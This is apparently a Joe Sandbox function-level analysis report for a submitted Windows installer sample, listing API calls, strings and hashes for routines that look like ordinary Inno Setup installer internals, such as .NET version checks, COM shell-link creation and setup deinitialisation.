                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                      • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                      • API String ID: 2610873146-3407710046
                                                                                      • Opcode ID: 0759357e475281c3d178149a1403ff3b79648049ae6c1278b3f2bdc8cf34fbc7
                                                                                      • Instruction ID: 95483c6525a53468b4ec8186bc606c8502f0d91924da71a6d47f5662d43c45fd
                                                                                      • Opcode Fuzzy Hash: 0759357e475281c3d178149a1403ff3b79648049ae6c1278b3f2bdc8cf34fbc7
                                                                                      • Instruction Fuzzy Hash: 112192757456046BE3109A68CC81F3F3799DB88715F09453EFD84DB382DA78ED0C8A9A
                                                                                      Function 00401A90 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 59COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlEnterCriticalSection.KERNEL32(00496420,00000000,00401B68), ref: 00401ABD
                                                                                      • LocalFree.KERNEL32(00642730,00000000,00401B68), ref: 00401ACF
                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,00642730,00000000,00401B68), ref: 00401AEE
                                                                                      • LocalFree.KERNEL32(00643730,?,00000000,00008000,00642730,00000000,00401B68), ref: 00401B2D
                                                                                      • RtlLeaveCriticalSection.KERNEL32(00496420,00401B6F), ref: 00401B58
                                                                                      • RtlDeleteCriticalSection.KERNEL32(00496420,00401B6F), ref: 00401B62
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                      • String ID: 0'd$07d$T=d$d=d
                                                                                      • API String ID: 3782394904-4213436424
                                                                                      • Opcode ID: d7983087b8bcbabcafc2c9d8a305f4a93e6fa46b606c4ef3e584c6169f95cf8d
                                                                                      • Instruction ID: bf2c7a4256457c5f50c71aa29f18f829c6f6e2c919ab822836d088e606c14c70
                                                                                      • Opcode Fuzzy Hash: d7983087b8bcbabcafc2c9d8a305f4a93e6fa46b606c4ef3e584c6169f95cf8d
                                                                                      • Instruction Fuzzy Hash: 5D118F30A403405EEB15ABE99D82F263BE59761B4CF56407BF80067AF1D77C9850C76E
                                                                                      Function 00454C98 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 248COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SysFreeString.OLEAUT32(?), ref: 00454E69
                                                                                      • 76CCE550.OLE32(00494A58,00000000,00000001,00494774,?,00000000,00454F64), ref: 00454CDA
                                                                                        • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                        • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                      • 76CCE550.OLE32(00494764,00000000,00000001,00494774,?,00000000,00454F64), ref: 00454D00
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: E550String$AllocByteCharFreeMultiWide
                                                                                      • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue$IShellLink::QueryInterface
                                                                                      • API String ID: 2757340368-2052886881
                                                                                      • Opcode ID: 5948eefd91c64643e410a8502d34ef97e64b0715af901c2b07599baa63df0646
                                                                                      • Instruction ID: 0b21da03975bca805d8248ee8d2b37e628922fffcf98328ca7261b0fae796446
                                                                                      • Opcode Fuzzy Hash: 5948eefd91c64643e410a8502d34ef97e64b0715af901c2b07599baa63df0646
                                                                                      • Instruction Fuzzy Hash: AA915071A00104AFDB50DFA9C885F9E77F8AF89709F50406AF904EB262DB78DD48CB59
                                                                                      Function 004573E0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127pipeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004575BF,?,00000000,00457622,?,?,02313858,00000000), ref: 0045743D
                                                                                      • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02313858,?,00000000,00457554,?,00000000,00000001,00000000,00000000,00000000,004575BF), ref: 0045749A
                                                                                      • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02313858,?,00000000,00457554,?,00000000,00000001,00000000,00000000,00000000,004575BF), ref: 004574A7
                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004574F3
                                                                                      • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,0045752D,?,-00000020,0000000C,-00004034,00000014,02313858,?,00000000,00457554,?,00000000), ref: 00457519
                                                                                      • GetLastError.KERNEL32(?,?,00000000,00000001,0045752D,?,-00000020,0000000C,-00004034,00000014,02313858,?,00000000,00457554,?,00000000), ref: 00457520
                                                                                        • Part of subcall function 004520A4: GetLastError.KERNEL32(00000000,00452B15,00000005,00000000,00452B4A,?,?,00000000,00496628,00000004,00000000,00000000,00000000,?,00492A61,00000000), ref: 004520A7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                      • String ID: CreateEvent$TransactNamedPipe
                                                                                      • API String ID: 2182916169-3012584893
                                                                                      • Opcode ID: c1a3a8f9ea1166c106d188104454f7bffd3a84fcc42e4e20bcaa0ea938d488a9
                                                                                      • Instruction ID: 79c6e3806f75cd6c2156c397a36c552c7ebc7e0cdca09418cd540dcb18b715b5
                                                                                      • Opcode Fuzzy Hash: c1a3a8f9ea1166c106d188104454f7bffd3a84fcc42e4e20bcaa0ea938d488a9
                                                                                      • Instruction Fuzzy Hash: 98418E70A04608BFDB15DF99D981F9EBBF8EB09710F5040B6F904E7792D6789E44CA28
                                                                                      Function 00455138 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 99libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,0045529D,?,?,00000031,?), ref: 00455160
                                                                                      • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00455166
                                                                                      • LoadTypeLib.OLEAUT32(00000000,?), ref: 004551B3
                                                                                        • Part of subcall function 004520A4: GetLastError.KERNEL32(00000000,00452B15,00000005,00000000,00452B4A,?,?,00000000,00496628,00000004,00000000,00000000,00000000,?,00492A61,00000000), ref: 004520A7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                      • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                      • API String ID: 1914119943-2711329623
                                                                                      • Opcode ID: 1ed3e8c5a2aa991d601313e4c083ed3eccbaf9bc08da749f5376dbd3bf59aa27
                                                                                      • Instruction ID: fb038adfd684185714a4e58cf340431a6a295a782a22b6c655451b98c415bd11
                                                                                      • Opcode Fuzzy Hash: 1ed3e8c5a2aa991d601313e4c083ed3eccbaf9bc08da749f5376dbd3bf59aa27
                                                                                      • Instruction Fuzzy Hash: DD31A571A00A04AFC711EFAACC61D6F77B9EB89B41B5044A6FD04D7352DA38D904CB29
                                                                                      Function 0042E274 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registrylibraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E379,?,?,00000001,00000000,?,?,00000001,00000000,00000002,00000000,0047BE41), ref: 0042E29D
                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E2A3
                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E379,?,?,00000001,00000000,?,?,00000001), ref: 0042E2F1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressCloseHandleModuleProc
                                                                                      • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                      • API String ID: 4190037839-2401316094
                                                                                      • Opcode ID: 45ed28070ffb47697e526778f64ff79688c24bec5b2b36becef891b4b1b2b151
                                                                                      • Instruction ID: d6249f7fc2f92a5c557ffc1224eecf0a88ec9f0d2c320431a8896816ae334499
                                                                                      • Opcode Fuzzy Hash: 45ed28070ffb47697e526778f64ff79688c24bec5b2b36becef891b4b1b2b151
                                                                                      • Instruction Fuzzy Hash: 80212670B00215EBDB00EAA7DC55B9F77A9EB44315FD04477A900E7281DB7C9E05DB58
                                                                                      Function 004019CC Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 48memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlInitializeCriticalSection.KERNEL32(00496420,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                      • RtlEnterCriticalSection.KERNEL32(00496420,00496420,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                      • LocalAlloc.KERNEL32(00000000,00000FF8,00496420,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                      • RtlLeaveCriticalSection.KERNEL32(00496420,00401A89,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                      • String ID: 0'd$T=d$`dI$`dI$d=d
                                                                                      • API String ID: 730355536-3618501334
                                                                                      • Opcode ID: f176e8b5bc4d8de55a84342bec8c86950c68c795945543f3ab918003abf5a290
                                                                                      • Instruction ID: 5e78e1d922e44001d172df758a9733a16a6df98b74bc9f0da5c534ca1700ba01
                                                                                      • Opcode Fuzzy Hash: f176e8b5bc4d8de55a84342bec8c86950c68c795945543f3ab918003abf5a290
                                                                                      • Instruction Fuzzy Hash: EC01C0706442405EFB19ABE99802B253ED4D795B88F13803FF440A6AF1C67C4840CB2D
                                                                                      Function 00416CF0 Relevance: 15.2, APIs: 10, Instructions: 167windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RectVisible.GDI32(?,?), ref: 00416D83
                                                                                      • SaveDC.GDI32(?), ref: 00416D97
                                                                                      • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416DBA
                                                                                      • RestoreDC.GDI32(?,?), ref: 00416DD5
                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00416E55
                                                                                      • FrameRect.USER32(?,?,?), ref: 00416E88
                                                                                      • DeleteObject.GDI32(?), ref: 00416E92
                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00416EA2
                                                                                      • FrameRect.USER32(?,?,?), ref: 00416ED5
                                                                                      • DeleteObject.GDI32(?), ref: 00416EDF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                      • String ID:
                                                                                      • API String ID: 375863564-0
                                                                                      • Opcode ID: 2d5a952dda77e96b055630d762204063f474f2b74445c94d99100d457d81a94c
                                                                                      • Instruction ID: 01d81588b69ff1f480347e903aed9c185fc6c29f227380d1fa6610f1b9ad60dd
                                                                                      • Opcode Fuzzy Hash: 2d5a952dda77e96b055630d762204063f474f2b74445c94d99100d457d81a94c
                                                                                      • Instruction Fuzzy Hash: A8513C712086449BDB50EF69C8C0B9B77E8EF48314F15566AFD48CB286C738EC81CB99
                                                                                      Function 00404ABF Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                      • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                      • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                      • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                      • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                      • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                      • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                      • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                      • String ID:
                                                                                      • API String ID: 1694776339-0
                                                                                      • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                      • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                      • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                      • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                      Function 00422158 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSystemMenu.USER32(00000000,00000000), ref: 004221A3
                                                                                      • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 004221C1
                                                                                      • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004221CE
                                                                                      • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004221DB
                                                                                      • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004221E8
                                                                                      • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 004221F5
                                                                                      • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422202
                                                                                      • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042220F
                                                                                      • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 0042222D
                                                                                      • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 00422249
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Delete$EnableItem$System
                                                                                      • String ID:
                                                                                      • API String ID: 3985193851-0
                                                                                      • Opcode ID: 05b40914ec909e1c9740d8afeb2cf42751dc2338b7eead5136cc8733da9e1836
                                                                                      • Instruction ID: e98f5eede000e984507cfb68b46ad6efe0a5c83d9602cc3651cf502f29ecaa29
                                                                                      • Opcode Fuzzy Hash: 05b40914ec909e1c9740d8afeb2cf42751dc2338b7eead5136cc8733da9e1836
                                                                                      • Instruction Fuzzy Hash: 23213370380744BAE720D725DD8BF9B7BD89B04708F0444A5BA487F2D7C6F9AE40869C
                                                                                      Function 0047C34C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 170windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(10000000), ref: 0047C4F4
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0047C508
                                                                                      • SendNotifyMessageA.USER32(00010474,00000496,00002710,00000000), ref: 0047C57A
                                                                                      Strings
                                                                                      • DeinitializeSetup, xrefs: 0047C405
                                                                                      • Restarting Windows., xrefs: 0047C555
                                                                                      • Not restarting Windows because Setup is being run from the debugger., xrefs: 0047C529
                                                                                      • Deinitializing Setup., xrefs: 0047C36A
                                                                                      • GetCustomSetupExitCode, xrefs: 0047C3A9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary$MessageNotifySend
                                                                                      • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                      • API String ID: 3817813901-1884538726
                                                                                      • Opcode ID: efad5fb6bae037c2cf07564e1a1779af0bcde21ed03e767c6d92b2780cbdc405
                                                                                      • Instruction ID: 90f5f2579ebd2cd042589c700d0c35de107af6cb7106057c8f5cc839c7e64824
                                                                                      • Opcode Fuzzy Hash: efad5fb6bae037c2cf07564e1a1779af0bcde21ed03e767c6d92b2780cbdc405
                                                                                      • Instruction Fuzzy Hash: 5851B130614200AFD721DB79DC95BAA7BE4EB59314F50C57BEC08C72A2DB38A845CB5D
                                                                                      Function 00457C10 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 130registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00457B28: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00457C5A,00000000,00457DA7,?,00000000,00000000,00000000), ref: 00457B75
                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00457DA7,?,00000000,00000000,00000000), ref: 00457CB6
                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00457DA7,?,00000000,00000000,00000000), ref: 00457D1C
                                                                                        • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      Strings
                                                                                      • .NET Framework version %s not found, xrefs: 00457D56
                                                                                      • .NET Framework not found, xrefs: 00457D6A
                                                                                      • v1.1.4322, xrefs: 00457D0E
                                                                                      • v2.0.50727, xrefs: 00457CA8
                                                                                      • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00457CD0
                                                                                      • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00457C6A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$Open
                                                                                      • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$v1.1.4322$v2.0.50727
                                                                                      • API String ID: 2976201327-1070292914
                                                                                      • Opcode ID: 38dafa01eb145cd46e344ec0d302f40d6a4ca12a07449fb32f1c0fadfb05638c
                                                                                      • Instruction ID: 1181c51870a89a76828bf4cdafa164266e6ab86bcafa1da5c5d87414d128b815
                                                                                      • Opcode Fuzzy Hash: 38dafa01eb145cd46e344ec0d302f40d6a4ca12a07449fb32f1c0fadfb05638c
                                                                                      • Instruction Fuzzy Hash: 5F41C730A081495FCB00DF65E851BEE77B6EF49309F5544BBE840DB292D739AA0ECB58
                                                                                      Function 004733A0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 92windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 004732C8: GetWindowThreadProcessId.USER32(00000000), ref: 004732D0
                                                                                        • Part of subcall function 004732C8: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,004733C7,0pI,00000000), ref: 004732E3
                                                                                        • Part of subcall function 004732C8: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 004732E9
                                                                                      • SendMessageA.USER32(00000000,0000004A,00000000,Z7G), ref: 004733D5
                                                                                      • GetTickCount.KERNEL32 ref: 0047341A
                                                                                      • GetTickCount.KERNEL32 ref: 00473424
                                                                                      • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00473479
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                      • String ID: 0pI$CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d$Z7G
                                                                                      • API String ID: 613034392-2401662188
                                                                                      • Opcode ID: 8feb52f6250f747c5a664b1527b2b5cd8d32300bfcf5c1eaa96ed0b76df53d0f
                                                                                      • Instruction ID: 8dd7748eb102d70c53ef4d50441e40eca7a6ef9e476b6454bb3470e68b985026
